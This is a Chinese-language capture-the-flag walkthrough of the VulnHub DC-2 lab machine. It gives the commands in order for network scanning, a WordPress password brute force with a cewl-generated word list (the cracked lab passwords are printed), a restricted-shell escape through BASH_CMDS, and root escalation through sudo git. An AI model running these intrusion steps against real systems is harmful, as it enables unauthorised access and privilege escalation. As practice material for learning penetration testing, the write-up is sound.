DC-2详情见:https://www.vulnhub.com/entry/dc-2,311/
靶机环境VIrtualBox,连接VirtualBox Host-Only网卡,IP为:192.168.56.103
攻击机环境VMware,桥接模式,桥接至VIrtualBox Host-Only网卡,IP为:192.168.56.177
扫描C段内存活主机
arp-scan -l
or
nmap -sP 192.168.56.1/24
访问http://192.168.56.103发现被重定向到了http://dc-2
修改/etc/hosts
Nmap扫描靶机收集信息
nmap -Pn -sSV -A -p- -T5 192.168.56.103
在站点找到flag1,并且提示使用cewl
PS:
Cewl是一款采用Ruby开发的应用程序,可以通过爬取URL地址返回一个字典文件,供爆破工具使用
利用cewl爬取站点生成字典
cewl -w dc2_password.txt http://dc-2/
WPscan枚举站点用户
wpscan --url http://dc-2/ -e u
利用cewl生成的字典进行爆破
wpscan --url http://dc-2/ -P /home/mochu7/Desktop/dc2_password.txt --max-threads 100
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
登录jerry得到flag2
tom账户可ssh登录
PS:这里ssh端口并不是22前面端口扫描也看出来了ssh端口是7744
tom用户shell受限制很多命令用不了
这里读取flag3.txt可以用less命令读取,不需要提权
提权利用:
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=PATH:/bin:/sbin:/usr/bin:/usr/sbin
flag3
flag4
且jerry用户之前测试ssh不能登录,但是在这里可以直接切换
根据flag4的提示,这里应该是git提权,首先查看哪些命令可以无密码使用root权限也就是sudo可以无密码执行的
接下来就是git提权
参考文章:https://gtfobins.github.io/gtfobins/git/
sudo git -p help config
!/bin/sh
final-flag
